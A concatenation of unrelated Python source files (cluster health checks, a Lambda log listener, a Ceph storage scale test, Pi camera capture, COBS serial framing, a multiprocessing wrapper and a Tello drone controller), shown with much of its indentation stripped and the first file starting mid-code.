logger.debug("checking health of cluster={}".format(cluster))
if not cluster:
logger.warning("Cannot found cluster id={}".format(cluster_id))
return True
if cluster.get("status") != "running":
logger.warning("cluster is not running id={}".format(cluster_id))
return True
if cluster.get("network_type") == NETWORK_TYPE_FABRIC_PRE_V1:
rest_api = cluster["service_url"]["rest"] + "/network/peers"
if not rest_api.startswith("http"):
rest_api = "http://" + rest_api
logger.debug("rest_api={}".format(rest_api))
logger.debug("---In Network type Fabric V 0.6---")
try:
r = requests.get(rest_api, timeout=timeout)
except Exception as e:
logger.error("Error to refresh health of cluster {}: {}".
format(cluster_id, e))
return True
peers = r.json().get("peers")
logger.debug("peers from rest_api: {}".format(peers))
if len(peers) == cluster["size"]:
self.db_update_one({"id": cluster_id},
{"health": "OK"})
return True
else:
logger.debug("checking result of cluster id={}".format(
cluster_id, peers))
self.db_update_one({"id": cluster_id},
{"health": "FAIL"})
return False
elif "fabric-1" in cluster.get('network_type'):
service_url = cluster.get("service_url", {})
health_ok = True
for url in service_url.values():
ip = url.split(":")[0]
port = int(url.split(":")[1])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((ip, port))
sock.close()
logger.debug("check {}:{} result {}".format(ip, port, result))
if result != 0:
health_ok = False
if not health_ok:
self.db_update_one({"id": cluster_id},
{"health": "FAIL"})
return False
else:
self.db_update_one({"id": cluster_id},
{"health": "OK"})
return True
return True
def db_update_one(self, filter, operations, after=True, col="active"):
"""
Update the data into the active db
:param filter: Which instance to update, e.g., {"id": "xxx"}
:param operations: data to update to db, e.g., {"$set": {}}
:param after: return AFTER or BEFORE
:param col: collection to operate on
:return: The updated host json dict
"""
state = CLUSTER_STATE.active.name if col == "active" \
else CLUSTER_STATE.released.name
filter.update({
"state": state
})
logger.info("filter {} operations {}".format(filter, operations))
kwargs = dict(('set__' + k, v) for (k, v) in operations.items())
for k, v in kwargs.items():
logger.info("k={}, v={}".format(k, v))
try:
ClusterModel.objects(id=filter.get("id")).update(
upsert=True,
**kwargs
)
doc = ClusterModel.objects.get(id=filter.get("id"))
except Exception as exc:
logger.info("exception {}".format(exc.message))
return None
return doc
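    # Example (illustrative): operations={"health": "OK"} is translated into
    # the mongoengine kwargs {"set__health": "OK"}, i.e. an atomic $set on
    # that field of the matching ClusterModel document.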
def _schema(self, doc, many=False):
cluster_schema = ClusterSchema(many=many)
return cluster_schema.dump(doc).data
cluster_handler = ClusterHandler()
|
http_listener.py | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import json
import os
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Event, Thread
""" Demonstrates code to set up an HTTP listener and receive log events
"""
RECEIVER_NAME = "sandbox"
LOCAL_DEBUGGING_IP = "0.0.0.0"
RECEIVER_PORT = 4243
def get_listener_address():
    return RECEIVER_NAME if os.getenv("AWS_SAM_LOCAL") != "true" else LOCAL_DEBUGGING_IP
def http_server_init(queue):
def handler(*args):
LogsHandler(queue, *args)
listener_address = get_listener_address()
print(f"Initializing HTTP Server on {listener_address}:{RECEIVER_PORT}")
server = HTTPServer((listener_address, RECEIVER_PORT), handler)
    # Ensure that the server thread is scheduled so that the server binds to
    # the port and starts listening before we subscribe to the logs and ask
    # for the next event.
started_event = Event()
    server_thread = Thread(target=serve, daemon=True,
                           args=(started_event, server, listener_address))
    server_thread.start()
    rc = started_event.wait(timeout=9)
    if rc is not True:
        raise Exception("server_thread timed out before starting")
# Server implementation
class LogsHandler(BaseHTTPRequestHandler):
def __init__(self, queue, *args):
self.queue = queue
BaseHTTPRequestHandler.__init__(self, *args)
def do_POST(self):
try:
cl = self.headers.get("Content-Length")
if cl:
data_len = int(cl)
else:
data_len = 0
content = self.rfile.read(data_len)
self.send_response(200)
self.end_headers()
batch = json.loads(content.decode("utf-8"))
self.queue.put(batch)
except Exception as e:
print(f"Error processing message: {e}")
# Server thread
def serve(started_event, server, listener_name):
# Notify that this thread is up and running
started_event.set()
try:
print(f"Serving HTTP Server on {listener_name}:{RECEIVER_PORT}")
server.serve_forever()
except:
print(f"Error in HTTP server {sys.exc_info()[0]}")
finally:
if server:
server.shutdown()
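# Usage sketch (an addition, not part of the original AWS sample): start the
# listener with a standard queue and drain the batches the Logs API would
# POST to it. The extension registration/subscription steps that a real
# Lambda extension performs are omitted here.
if __name__ == "__main__":
    import queue
    log_queue = queue.Queue()
    http_server_init(log_queue)
    while True:
        batch = log_queue.get()
        print(f"received a batch of {len(batch)} log events")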
|
server.py | """
Base threading server class
"""
from threading import Thread
class ThreadServer:
def __init__(self):
self.server_thread = None
self.running = False
def start(self, *args, **kwargs):
if self.running:
return
self.running = True
self.server_thread = Thread(target=self.run, args=args, kwargs=kwargs)
self.server_thread.start()
def stop(self):
self.running = False
def run(self):
"""
Server main function
"""
pass
class StaticServer:
def start(self, *args, **kwargs):
pass
def stop(self):
pass
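# Example subclass (a sketch, not part of the original module): override
# run() and poll self.running so that stop() actually ends the loop.
import time
class PollingServer(ThreadServer):
    def run(self, interval=1.0):
        while self.running:
            # one unit of work per tick would go here
            time.sleep(interval)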
|
test_pv_scale_and_respin_ceph_pods.py | """
PV Create with ceph pod respin & Memory Leak Test: Test the PVC limit
with 3 worker nodes, create PVCs and check for memory leak.
TODO: This test needs to be executed on a scaled setup;
adding node scale is not yet supported.
"""
import logging
import pytest
import threading
import time
from ocs_ci.helpers import helpers, disruption_helpers
from ocs_ci.ocs import constants
from ocs_ci.ocs.resources import pod
from ocs_ci.utility import utils
from ocs_ci.framework.testlib import scale, E2ETest, ignore_leftovers
from ocs_ci.framework.pytest_customization.marks import skipif_external_mode
log = logging.getLogger(__name__)
class BasePvcCreateRespinCephPods(E2ETest):
"""
Base Class to create POD with PVC and respin ceph Pods
"""
def create_pvc_pod(self, rbd_sc_obj, cephfs_sc_obj, number_of_pvc, size):
"""
Function to create multiple PVC of different type and bind mount them to pods
Args:
rbd_sc_obj (obj_dict): rbd storageclass object
cephfs_sc_obj (obj_dict): cephfs storageclass object
number_of_pvc (int): pvc count to be created for each types
size (str): size of each pvc to be created eg: '10Gi'
"""
log.info(f"Create {number_of_pvc} pvcs and pods")
cephfs_pvcs = helpers.create_multiple_pvc_parallel(
cephfs_sc_obj,
self.namespace,
number_of_pvc,
size,
access_modes=[constants.ACCESS_MODE_RWO, constants.ACCESS_MODE_RWX],
)
rbd_pvcs = helpers.create_multiple_pvc_parallel(
rbd_sc_obj,
self.namespace,
number_of_pvc,
size,
access_modes=[constants.ACCESS_MODE_RWO, constants.ACCESS_MODE_RWX],
)
# Appending all the pvc obj to base case param for cleanup and evaluation
self.all_pvc_obj.extend(cephfs_pvcs + rbd_pvcs)
# Create pods with above pvc list
cephfs_pods = helpers.create_pods_parallel(
cephfs_pvcs, self.namespace, constants.CEPHFS_INTERFACE
)
rbd_rwo_pvc, rbd_rwx_pvc = ([] for i in range(2))
for pvc_obj in rbd_pvcs:
if pvc_obj.get_pvc_access_mode == constants.ACCESS_MODE_RWX:
rbd_rwx_pvc.append(pvc_obj)
else:
rbd_rwo_pvc.append(pvc_obj)
rbd_rwo_pods = helpers.create_pods_parallel(
rbd_rwo_pvc, self.namespace, constants.CEPHBLOCKPOOL
)
rbd_rwx_pods = helpers.create_pods_parallel(
rbd_rwx_pvc, self.namespace, constants.CEPHBLOCKPOOL, raw_block_pv=True
)
temp_pod_objs = list()
temp_pod_objs.extend(cephfs_pods + rbd_rwo_pods)
# Appending all the pod obj to base class param for cleanup and evaluation
self.all_pod_obj.extend(temp_pod_objs + rbd_rwx_pods)
# Start respective IO on all the created PODs
threads = list()
for pod_obj in temp_pod_objs:
process = threading.Thread(
target=pod_obj.run_io,
args=(
"fs",
"512M",
),
)
process.start()
threads.append(process)
for pod_obj in rbd_rwx_pods:
process = threading.Thread(
target=pod_obj.run_io,
args=(
"block",
"512M",
),
)
process.start()
threads.append(process)
for process in threads:
process.join()
def respin_ceph_pod(self, resource_to_delete):
"""
Function to respin ceph pods one by one,
delete_resource functions checks for the deleted pod back up and running
Args:
resource_to_delete (str): Ceph resource type to be deleted, eg: mgr/mon/osd/mds
"""
disruption = disruption_helpers.Disruptions()
disruption.set_resource(resource=resource_to_delete)
no_of_resource = disruption.resource_count
for i in range(0, no_of_resource):
disruption.delete_resource(resource_id=i)
def cleanup(self):
"""
        Function to clean up the SC, PVC and POD objects in parallel.
"""
helpers.delete_objs_parallel(pod.get_all_pods(namespace=self.namespace))
helpers.delete_objs_parallel(self.all_pvc_obj)
self.rbd_sc_obj.delete()
self.cephfs_sc_obj.delete()
@scale
@ignore_leftovers
@skipif_external_mode
@pytest.mark.parametrize(
argnames="resource_to_delete",
argvalues=[
pytest.param(*["mgr"], marks=[pytest.mark.polarion_id("OCS-766")]),
pytest.param(*["mon"], marks=[pytest.mark.polarion_id("OCS-764")]),
pytest.param(*["osd"], marks=[pytest.mark.polarion_id("OCS-765")]),
pytest.param(*["mds"], marks=[pytest.mark.polarion_id("OCS-613")]),
],
)
class TestPVSTOcsCreatePVCsAndRespinCephPods(BasePvcCreateRespinCephPods):
"""
Class for PV scale Create Cluster with 1000 PVC, then Respin ceph pods
Check for Memory leak, network and stats.
"""
@pytest.fixture()
def setup_fixture(self, request):
def finalizer():
self.cleanup()
request.addfinalizer(finalizer)
@pytest.fixture()
def namespace(self, project_factory):
"""
Create a project for the test
"""
proj_obj = project_factory()
self.namespace = proj_obj.namespace
@pytest.fixture()
def storageclass(self, storageclass_factory):
"""
Create Storage class for rbd and cephfs
"""
self.rbd_sc_obj = storageclass_factory(interface=constants.CEPHBLOCKPOOL)
self.cephfs_sc_obj = storageclass_factory(interface=constants.CEPHFILESYSTEM)
def test_pv_scale_out_create_pvcs_and_respin_ceph_pods(
self,
namespace,
storageclass,
setup_fixture,
resource_to_delete,
memory_leak_function,
):
pvc_count_each_itr = 10
scale_pod_count = 120
size = "10Gi"
test_run_time = 180
self.all_pvc_obj, self.all_pod_obj = ([] for i in range(2))
# Identify median memory value for each worker node
median_dict = helpers.get_memory_leak_median_value()
log.info(f"Median dict values for memory leak {median_dict}")
# First Iteration call to create PVC and POD
self.create_pvc_pod(
self.rbd_sc_obj, self.cephfs_sc_obj, pvc_count_each_itr, size
)
# Re-spin the ceph pods one by one in parallel with PVC and POD creation
while True:
if scale_pod_count <= len(self.all_pod_obj):
log.info(f"Create {scale_pod_count} pvc and pods")
break
else:
thread1 = threading.Thread(
target=self.respin_ceph_pod, args=(resource_to_delete,)
)
thread2 = threading.Thread(
target=self.create_pvc_pod,
args=(
self.rbd_sc_obj,
self.cephfs_sc_obj,
pvc_count_each_itr,
size,
),
)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
# Added sleep for test case run time and for capturing memory leak after scale
time.sleep(test_run_time)
utils.ceph_health_check()
helpers.memory_leak_analysis(median_dict)
|
picam.py | import logging
from io import BytesIO
import time
from PIL import Image
import threading
import queue
log = logging.getLogger(__name__)
picamera_override = None
class Picamera():
def __init__(self, image_format='jpeg', queue_max_size=10):
self.error = None
self.format = image_format
self.queue = queue.Queue(queue_max_size)
self._stop = threading.Event()
self.thread1 = threading.Thread(target=self.run, args=())
def __enter__(self):
self.start()
return self
    def __exit__(self, exc_type, exc_value, tb):
        self.stop()
        return False  # returning a truthy value here would suppress exceptions
def start(self):
self._stop.clear()
self.thread1.start()
def has_failure(self):
return self.error is not None
def _get_camera(self):
if picamera_override is None:
try:
import picamera
return picamera.PiCamera()
except Exception as err:
log.warning("Error loading picamera module: %s" % err)
self.error = err
return None
else:
return picamera_override.PiCamera()
def run(self):
cam = self._get_camera()
if cam is None:
# picam not available
return
with cam as camera:
if self.has_failure():
return None
log.debug("Started Picamera")
time.sleep(2)
stream = BytesIO()
for _ in camera.capture_continuous(stream, format=self.format):
if self._stop.is_set():
log.debug("Stop requested")
break
if not self.queue.full():
try:
self.queue.put(
Image.open(BytesIO(stream.getvalue())),
block=False
)
log.debug("Queued capture")
except queue.Full:
pass
except Exception as ex:
log.error("Failed to add to queue: %s" % ex)
stream.seek(0)
stream.truncate()
try:
stream.close()
except Exception as ex:
log.error("Failed to close stream: %s" % ex)
def acquire(self):
try:
# log.debug("queue len=%s" % self.queue.qsize())
return self.queue.get(block=False)
except queue.Empty:
return None
def stop(self):
self._stop.set()
self.queue = queue.Queue()
self.thread1.join()
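# Usage sketch (an assumption, not part of the original module): the context
# manager starts the capture thread; acquire() returns the newest queued PIL
# image, or None while the queue is still empty.
if __name__ == "__main__":
    with Picamera() as cam:
        time.sleep(3)  # give the camera time to warm up and queue frames
        img = cam.acquire()
        if img is not None:
            img.save("frame.jpg")  # hypothetical output path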
|
cobs_serial.py | import time
import serial
import struct
import threading
# This is different from cobs.py as no padding is performed here
# Behavior is undefined if first byte of buf is 0
def cobs_encode(buf):
if len(buf) == 0:
return b"\x00"
if buf[0] != 0:
buf = b"\x00" + buf
return cobs_encode(buf)
# buf[0] must be 0 here
assert buf[0] == 0
a, sep, b = buf[1:].partition(b"\x00")
return bytes([len(a)+1])+a+cobs_encode(sep + b)
def cobs_decode(buf):
if buf == b"":
return b""
if buf == b"\x00":
return b""
out = bytearray(buf[0])
out[1:] = buf[1:len(out)]
return out + cobs_decode(buf[len(out):])
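# Round-trip sketch (added, not in the original module): decoding yields the
# frame with its leading zero byte intact, which get_packet() below strips
# via buf[1:]. A payload whose own first byte is 0 loses that byte, matching
# the "behavior is undefined" caveat above.
assert cobs_decode(cobs_encode(b"a\x00b")) == b"\x00a\x00b"
assert cobs_decode(cobs_encode(b"a\x00b"))[1:] == b"a\x00b"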
class COBSSerial:
def __init__(self, port):
self.port = serial.Serial(None, 115200, timeout=0)
self.port.port = port
self.subscribers = {}
self.port_lock = threading.RLock()
self.read_thread = None
self.stop = False
self.read_buf = bytearray()
def begin(self):
self.port.open()
time.sleep(0.1)
with self.port_lock:
self.port.write(range(64)) # Get out of bootloader
if self.read_thread is None:
self.read_thread = threading.Thread(
target=self.read_thread_fun)
self.read_thread.start()
def end(self):
self.stop = True
self.read_thread.join()
self.read_thread = None
self.port.close()
def get_packet(self):
with self.port_lock:
buf = self.port.read(64)
self.read_buf += buf
if 0 in self.read_buf:
sep = self.read_buf.find(0)
buf = self.read_buf[:sep]
self.read_buf = self.read_buf[sep+1:]
buf = cobs_decode(buf)
return buf[1:]
else:
return None
def read_thread_fun(self):
while not self.stop:
buf = self.get_packet()
if buf is None:
continue
tag = buf[:3].decode("cp437")
if tag in self.subscribers:
if "__iter__" not in dir(self.subscribers[tag]):
# Just call the function itself
self.subscribers[tag](buf)
else:
for f in self.subscribers[tag]:
f(buf)
def write(self, payload_bytes):
buf = cobs_encode(payload_bytes)
with self.port_lock:
self.port.write(buf)
#self.port.flush()
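# Subscriber sketch (added): read_thread_fun dispatches each decoded packet
# on its first three bytes, so handlers are registered under a 3-character
# tag; a value may be a single callable or an iterable of callables.
# ser = COBSSerial("/dev/ttyACM0")          # hypothetical port name
# ser.subscribers["IMU"] = lambda buf: print(buf[3:])
# ser.begin()
# ser.write(b"CMDgo")                       # framed with cobs_encode()
# ser.end()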
|
multiprocess_wrapper.py | import pickle
import logging
import time
from logging.handlers import QueueHandler, QueueListener
import argparse
from flarestack.core.minimisation import MinimisationHandler, read_mh_dict
from multiprocessing import JoinableQueue, Process, Queue, Value
import random
from multiprocessing import set_start_method
logger = logging.getLogger(__name__)
try:
set_start_method("fork")
except RuntimeError:
pass
def generate_dynamic_mh_class(mh_dict):
# mh_dict = read_mh_dict(mh_dict)
try:
mh_name = mh_dict["mh_name"]
except KeyError:
raise KeyError("No MinimisationHandler specified.")
# Set up dynamic inheritance
try:
ParentMinimisationHandler = MinimisationHandler.subclasses[mh_name]
except KeyError:
raise KeyError("Parent class {} not found.".format(mh_name))
class MultiProcessingMinimisationHandler(ParentMinimisationHandler):
def add_injector(self, season, sources):
pass
return MultiProcessingMinimisationHandler(mh_dict)
class MultiProcessor:
queue = None
results = dict()
def __init__(self, n_cpu, **kwargs):
self.queue = JoinableQueue()
self.log_queue = Queue()
self.n_tasks = Value("i", 0)
kwargs["n_tasks"] = self.n_tasks
self.processes = [
Process(target=self.run_trial, kwargs=kwargs) for _ in range(int(n_cpu))
]
self.mh = MinimisationHandler.create(kwargs["mh_dict"])
for season in self.mh.seasons.keys():
inj = self.mh.get_injector(season)
inj.calculate_n_exp()
self.mh_dict = kwargs["mh_dict"]
self.scales = []
handler = logging.StreamHandler()
handler.setFormatter(
logging.Formatter("%(levelname)s: %(asctime)s - %(process)s - %(message)s")
)
# ql gets records from the queue and sends them to the handler
ql = QueueListener(self.log_queue, handler)
ql.start()
for p in self.processes:
p.start()
def add_to_queue(self, item):
self.queue.put(item)
def dump_all_injection_values(self):
for scale in self.scales:
self.mh.dump_injection_values(scale)
def run_trial(self, **kwargs):
qh = QueueHandler(self.log_queue)
logger.addHandler(qh)
mh_dict = kwargs["mh_dict"]
mpmh = generate_dynamic_mh_class(mh_dict)
n_tasks = kwargs["n_tasks"]
while True:
item = self.queue.get()
if item is None:
break
(scale, seed) = item
full_dataset = self.mh.prepare_dataset(scale, seed)
mpmh.run_single(full_dataset, scale, seed)
with n_tasks.get_lock():
n_tasks.value -= 1
self.queue.task_done()
def fill_queue(self):
scale_range, n_trials = self.mh.trial_params(self.mh_dict)
self.scales = scale_range
for scale in scale_range:
for _ in range(n_trials):
self.add_to_queue((scale, int(random.random() * 10**8)))
n_tasks = len(scale_range) * n_trials
with self.n_tasks.get_lock():
self.n_tasks.value += n_tasks
logger.info("Added {0} trials to queue. Now processing.".format(n_tasks))
        while self.n_tasks.value > 0:
logger.info("{0} tasks remaining.".format(self.n_tasks.value))
time.sleep(30)
logger.info("Finished processing {0} tasks.".format(n_tasks))
def terminate(self):
"""wait until queue is empty and terminate processes"""
self.queue.join()
for p in self.processes:
p.terminate()
self.dump_all_injection_values()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.terminate()
def run_multiprocess(n_cpu, mh_dict):
with MultiProcessor(n_cpu=n_cpu, mh_dict=mh_dict) as r:
r.fill_queue()
r.terminate()
del r
if __name__ == "__main__":
import os
logging.basicConfig(level=logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--file", help="Path for analysis pkl_file")
parser.add_argument("-n", "--n_cpu", default=min(max(1, os.cpu_count() - 1), 32))
cfg = parser.parse_args()
logger.info(f"N CPU available {os.cpu_count()}. Using {cfg.n_cpu}")
with open(cfg.file, "rb") as f:
mh_dict = pickle.load(f)
run_multiprocess(n_cpu=cfg.n_cpu, mh_dict=mh_dict)
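# Invocation sketch (an assumption): the --file pickle holds the mh_dict; the
# only key this wrapper itself requires is "mh_name" (used by
# generate_dynamic_mh_class); everything else is flarestack
# MinimisationHandler configuration built elsewhere.
#
#   import pickle
#   with open("analysis.pkl", "wb") as f:
#       pickle.dump(mh_dict, f)   # mh_dict built elsewhere
#
#   python multiprocess_wrapper.py -f analysis.pkl -n 4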
|
tello.py | import os
import socket
import queue
import threading
import time
import datetime
import cv2
import numpy as np
import paddlehub as hub
from PIL import Image
from .stats import Stats
from .frame2html import VideoCamera, run_app
q = queue.Queue()
# q.queue.clear()
class Tello:
def __init__(self, te_ip: str = '192.168.10.1', debug: bool = True):
        # Open a local UDP port on 8889 for drone communication
        self.local_ip = ''
        self.local_port = 8889
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.socket.bind((self.local_ip, self.local_port))
        # Set the drone's IP and port info
        self.te_ip = te_ip
        self.te_port = 8889
        self.te_address = (self.te_ip, self.te_port)
self.log = []
self.picture_path = ''
self.file_path = ''
self.frame = None
        # Load the animal recognition model
        self.module = hub.Module(name="resnet50_vd_animals")
        # Initialize the response thread
        self.receive_thread = threading.Thread(target=self._receive_thread)
        self.receive_thread.daemon = True
        self.receive_thread.start()
        # Runtime options for this project
self.stream_state = False
self.camera_state = False
self.color_state = False
self.video_state = False
self.save_state = False
self.picture_state = False
self.animal_state = False
self.flip_frame = False
self.now_color = 0
self.MAX_TIME_OUT = 15.0
self.debug = debug
        # Put the drone into command mode
        self.command()
def send_command(self, command: str, query: bool = False):
        # Create a new log entry for the outbound command
        self.log.append(Stats(command, len(self.log)))
        # Send the command to the drone
        self.socket.sendto(command.encode('utf-8'), self.te_address)
        # Show a confirmation message
        if self.debug is True:
            print('Send Command: {}'.format(command))
        # Check whether the command has timed out (based on MAX_TIME_OUT)
        start = time.time()
        while not self.log[-1].got_response():  # loop while no response has been logged
            now = time.time()
            difference = now - start
            if difference > self.MAX_TIME_OUT:
                print('Connect Time Out!')
                break
        # Print the drone's response
        if self.debug is True and query is False:
            print('Response: {}'.format(self.log[-1].get_response()))
def _receive_thread(self):
while True:
            # Check for a drone response; socket errors are caught below
try:
self.response, ip = self.socket.recvfrom(1024)
self.log[-1].add_response(self.response)
except socket.error as exc:
print('Error: {}'.format(exc))
def _cap_video_thread(self):
        # Create the stream-capture object
cap = cv2.VideoCapture('udp://' + self.te_ip + ':11111')
# cap.set(cv2.CAP_PROP_BUFFERSIZE, 2)
while self.stream_state:
ret, frame = cap.read()
while ret:
ret, frame = cap.read()
if self.flip_frame:
frame = cv2.flip(frame, 0)
cv2.imshow("DJI Tello", frame)
q.put(frame)
k = cv2.waitKey(1) & 0xFF
                # If the Esc key is pressed, close the video stream
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
def _service_video_thread(self):
while True:
self.frame = q.get()
            # k = cv2.waitKey(1) & 0xFF
            # If the F1 key was pressed, save a screenshot to the current location
            # if k == 0 or self.camera_state:
            if self.camera_state:
                self.file_path = self.picture_path + '\\' + datetime.datetime.now().strftime('%Y%m%d_%H%M%S') + '.png'
                print('Picture path:', self.file_path)
try:
cv2.imwrite(self.file_path, self.frame)
except Exception as e:
                    print('Failed to save the picture:', e)
self.camera_state = False
            # Recognize animals
if self.animal_state:
results = self.module.classification(images=[self.frame])
# print(results)
key_value_list = list(results[0].items())
key_first, value_first = key_value_list[0][0], key_value_list[0][1]
                if key_first != '非动物':  # '非动物' is the model's "non-animal" label
                    # print('Detected:', key_first, 'similarity:', value_first)
cv2.imshow(key_first, self.frame)
self.animal_state = False
            # Show the photo
if self.picture_state:
file = self.file_path
                Image.open(file).show()
self.picture_state = False
            # Detect the current color
if self.color_state:
self.detect_color(self.frame)
self.color_state = False
            # Send the video stream over HTTP
if self.video_state:
self.video_http(self.frame)
self.video_state = False
            # Save the video stream locally
if self.save_state:
self.video_save(self.frame)
self.save_state = False
def wait(self, delay: float):
        # Show a wait message
        if self.debug is True:
            print('Wait {} Seconds...'.format(delay))
        # Add a log entry for the delay
        self.log.append(Stats('wait', len(self.log)))
        # Apply the delay
        time.sleep(delay)
@staticmethod
def video_http(frame):
vc = VideoCamera(frame)
run_app()
    @staticmethod
    def video_save(frame):
        # NOTE: a new VideoWriter is created on every call, so each call
        # rewrites output.avi with just one flipped frame
        fourcc = cv2.VideoWriter_fourcc(*'XVID')
        out = cv2.VideoWriter('output.avi', fourcc, 20.0, (640, 480))
        frame = cv2.flip(frame, 0)
        # write the flipped frame
        out.write(frame)
def get_log(self):
return self.log
    def take_picture(self, path=os.getcwd()):
        """Take a photo (note: the default path is evaluated once, at import time)"""
        self.camera_state = True
        self.picture_path = path
    def show_picture(self):
        """Show the photo"""
        self.picture_state = True
    def flip_video(self):
        """Flip the video; enable when a downward-view mirror is fitted"""
        self.flip_frame = True
    def identify_animal(self):
        """Recognize animals"""
        self.animal_state = True
    def identify_color(self):
        """Detect the current color (red or green)"""
        self.color_state = True
        time.sleep(0.5)
        return self.now_color
    # The commands below are strongly recommended to be used alongside the official SDK docs:
    # https://www.ryzerobotics.com/cn/tello/downloads
    # Control commands
def command(self):
"""进入SDK命令模式"""
self.send_command('command')
def takeoff(self):
"""自动起飞,1米左右"""
self.send_command('takeoff')
def land(self):
"""自动降落"""
self.send_command('land')
def streamon(self):
"""打开视频流"""
self.send_command('streamon')
self.stream_state = True
self.cap_video_thread = threading.Thread(target=self._cap_video_thread)
self.cap_video_thread.daemon = True
self.cap_video_thread.start()
def streamoff(self):
"""关闭视频流"""
self.stream_state = False
self.send_command('streamoff')
def stream_service_on(self):
"""是否开启视频流附加功能,开启视频流会卡顿"""
self.service_video_thread = threading.Thread(target=self._service_video_thread)
self.service_video_thread.daemon = True
self.service_video_thread.start()
def detect_color(self, frame):
"""颜色识别"""
# frame = cv2.imread("test.jpg")
hue_image = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
low_red_range1 = np.array([110, 43, 0])
high_red_range1 = np.array([180, 255, 255])
threshold_red1 = cv2.inRange(hue_image, low_red_range1, high_red_range1)
res_red1 = cv2.bitwise_and(frame, frame, mask=threshold_red1)
low_red_range2 = np.array([0, 43, 0])
high_red_range2 = np.array([10, 255, 255])
threshold_red2 = cv2.inRange(hue_image, low_red_range2, high_red_range2)
res_red2 = cv2.bitwise_and(frame, frame, mask=threshold_red2)
threshold_red = threshold_red1 + threshold_red2
res_red = res_red1 + res_red2
low_green_range = np.array([35, 43, 46])
high_green_range = np.array([77, 255, 255])
threshold_green = cv2.inRange(hue_image, low_green_range, high_green_range)
res_green = cv2.bitwise_and(frame, frame, mask=threshold_green)
res = res_red + res_green
if cv2.countNonZero(threshold_green) > 0.5 * np.size(threshold_green):
self.now_color = 'green'
elif ((cv2.countNonZero(threshold_red) > 0.5 * np.size(threshold_red)) & (
cv2.countNonZero(threshold_red) < 0.7 * np.size(threshold_red))):
self.now_color = 'red'
else:
self.now_color = 'none'
# color = cv2.cvtColor(binary, cv2.COLOR_GRAY2BGR)
return self.now_color, res
def emergency(self):
"""停止电机转动"""
self.send_command('emergency')
    def up(self, x: int):
        """Fly up x (20-500) cm"""
        self.send_command('up {}'.format(x))
    def down(self, x: int):
        """Fly down x (20-500) cm"""
        self.send_command('down {}'.format(x))
    def left(self, x: int):
        """Fly left x (20-500) cm"""
        self.send_command('left {}'.format(x))
    def right(self, x: int):
        """Fly right x (20-500) cm"""
        self.send_command('right {}'.format(x))
    def forward(self, x: int):
        """Fly forward x (20-500) cm"""
        self.send_command('forward {}'.format(x))
    def back(self, x: int):
        """Fly backward x (20-500) cm"""
        self.send_command('back {}'.format(x))
    def cw(self, angle: int):
        """Rotate clockwise by angle degrees (1-360)"""
        self.send_command('cw {}'.format(angle))
    def ccw(self, angle: int):
        """Rotate counter-clockwise by angle degrees (1-360)"""
        self.send_command('ccw {}'.format(angle))
    def flip(self, direction: str):
        """Flip in the given direction; left is abbreviated l, likewise right=r, forward=f, back=b"""
        self.send_command('flip {}'.format(direction))
    def go(self, x: int, y: int, z: int, speed: int):
        """Fly to coordinate (x, y, z) at the given speed (cm/s)
        x: -500 - 500
        y: -500 - 500
        z: -500 - 500
        speed: 10 - 100 (cm/s)
        x, y and z cannot all be within -20 ~ 20 at the same time"""
        self.send_command('go {} {} {} {}'.format(x, y, z, speed))
    def stop(self):
        """Stop moving and hover; available at any time"""
        self.send_command('stop')
    def curve(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
        """Fly an arc at the given speed (cm/s) through (x1, y1, z1) to (x2, y2, z2)
        If the arc radius is not within 0.5-10 meters, a warning is returned
        x1, x2: -500 - 500
        y1, y2: -500 - 500
        z1, z2: -500 - 500
        speed: 10-60
        x, y and z cannot all be within -20 ~ 20 at the same time"""
        self.send_command('curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed))
    def go_mid(self, x: int, y: int, z: int, speed: int, mid: str):
        """Fly to (x, y, z) in the coordinate system of the mission pad with the given id, at the given speed (cm/s)
        mid:
        m1/m2/~/m8: the mission pad ID printed on the pad
        m-1: the mission pad the drone's internal algorithm detects fastest, picked at random among detected pads
        m-2: the mission pad closest to the drone's center
        x: -500 - 500
        y: -500 - 500
        z: 0 - 500
        speed: 10-100 (cm/s)
        x, y and z cannot all be within -20 ~ 20 at the same time"""
        self.send_command('go {} {} {} {} {}'.format(x, y, z, speed, mid))
    def curve_mid(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int, mid: str):
        """Fly an arc at the given speed (cm/s) through (x1, y1, z1) to (x2, y2, z2) in the coordinate system of mission pad mid
        If the arc radius is not within 0.5-10 meters, a warning is returned
        x1, x2: -500 - 500
        y1, y2: -500 - 500
        z1, z2: 0 - 500
        speed: 10-60
        x, y and z cannot all be within -20 ~ 20 at the same time"""
        self.send_command('curve {} {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed, mid))
    def jump_mid(self, x: int, y: int, z: int, speed: int, yaw: int, mid1: str, mid2: str):
        """Fly to (x, y, z) in the mid1 coordinate system and hover, then detect the mid2 mission pad
        and rotate to the given yaw value at (0, 0, z) in the mid2 coordinate system (z > 0)"""
        self.send_command('jump {} {} {} {} {} {} {}'.format(x, y, z, speed, yaw, mid1, mid2))
    # Setting commands
    def set_speed(self, speed: int):
        """Set the current speed to speed cm/s, speed = 10-100"""
        self.send_command('speed {}'.format(speed))
    def rc_control(self, a: int, b: int, c: int, d: int):
        """Set the four remote-control channel stick values
        a: roll (-100~100)
        b: pitch (-100~100)
        c: throttle (-100~100)
        d: yaw (-100~100)
        """
        self.send_command('rc {} {} {} {}'.format(a, b, c, d))
    def set_wifi(self, ssid: str, passwrd: str):
        """Change the drone's Wi-Fi credentials
        ssid: the new Wi-Fi SSID
        passwrd: the new Wi-Fi password
        """
        self.send_command('wifi {} {}'.format(ssid, passwrd))
    def mon(self):
        """Enable mission pad detection; both forward and downward detection are enabled by default"""
        self.send_command('mon')
    def moff(self):
        """Disable mission pad detection"""
        self.send_command('moff')
    def mdirection(self, mdir: int):
        """mdir=0/1/2
        0: enable downward detection
        1: enable forward detection
        2: enable both forward and downward detection
